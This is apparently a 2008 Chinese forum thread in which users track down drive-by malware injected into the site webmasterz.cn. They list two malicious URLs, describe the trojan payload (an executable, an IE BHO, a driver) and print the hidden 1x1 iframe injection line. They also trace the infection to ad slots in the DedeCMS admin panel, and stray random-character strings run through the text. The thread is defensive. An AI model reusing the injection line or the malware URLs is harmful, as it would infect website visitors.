webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
http://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
; m7 A) t: {- }- K! x這兩個是免殺的，還有幾個沒記下來，
這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了
" d1 v8 j) H0 B
iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
" J0 ]8 c6 _4 Q( F- \  r然後再這個地址轉到ppp.749571.co m/dm/test.htm
% D. k5 l' b. _, E# L; @為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
( m- Y) r0 w$ d靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
' c2 v4 q$ f* N5 i  S* Q. c沒裝REAL就沒事，好在我重新裝的系統:

% }% J3 X# o" t4 i3 B說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
5 |- ?! x) \/ `" S) c進dede後台
, k1 T4 {% h  X' @檢查 ad_js.php?aid=1  
ad_js.php?aid=2
$ q  F) H0 ]) w$ `6 kad_js.php?aid=3
- Y5 G2 S1 @4 }4 A5 e7 m2 mad_js.php?aid=4
- |  h' H# Q0 a3 N/ T, e5 v
這幾個廣告 裡面的代碼
8 R7 X  o( N# B8 b' S4 K6 h在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

: Y# c3 b' _) D. `
: N7 n5 d+ ?. K3 O: T這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表


這個檢查了沒有的

- k: {1 D1 o1 L
" s2 C2 f; A) s, A0 t" F我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表
$ Z$ A. e, c: v9 A% W9 H
# c1 E3 x# t9 u7 ]2 v
這個檢查了沒有的

; h1 g$ h" ~, Q8 v: a+ h7 s' t木馬就是在這裡裡啊
在後台的掉茅廁位設置那
3 x  U' O/ d  n" |$ h! U4 o裡

現在明瞭.
1 C/ j5 c/ G4 l( g有人收流量做ppp.749571.co m的..
, y- I$ z. k1 ~$ h. Y最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景